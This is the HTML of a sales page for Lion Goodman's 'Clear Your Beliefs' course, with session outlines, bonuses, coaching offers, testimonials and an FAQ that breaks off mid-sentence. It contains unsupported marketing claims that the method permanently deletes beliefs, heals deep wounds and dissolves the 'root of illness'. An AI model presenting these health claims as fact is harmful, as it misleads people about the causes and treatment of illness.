I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and 